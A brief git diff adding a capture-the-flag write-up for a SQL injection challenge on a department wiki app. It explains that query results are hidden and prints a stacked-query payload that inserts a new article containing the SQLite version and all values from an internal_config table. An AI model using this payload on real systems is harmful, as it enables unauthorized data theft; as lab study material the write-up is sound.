Second CTFs part

web-sqli/02_department_wiki/writeup

@@ -0,0 +1,6 @@
+(From the source code) The server executes our query injection but shows the results of a safe query version.
+Therefore I need another way to show the output, INSERT works to create new article, I create the article with the output of
+the SELECT I made.
+
+a'; INSERT INTO articles (department_id, title,slug,content,author)
+VALUES(1,sqlite_version(),'SLUG6',(SELECT GROUP_CONCAT(value) FROM internal_config),'e') --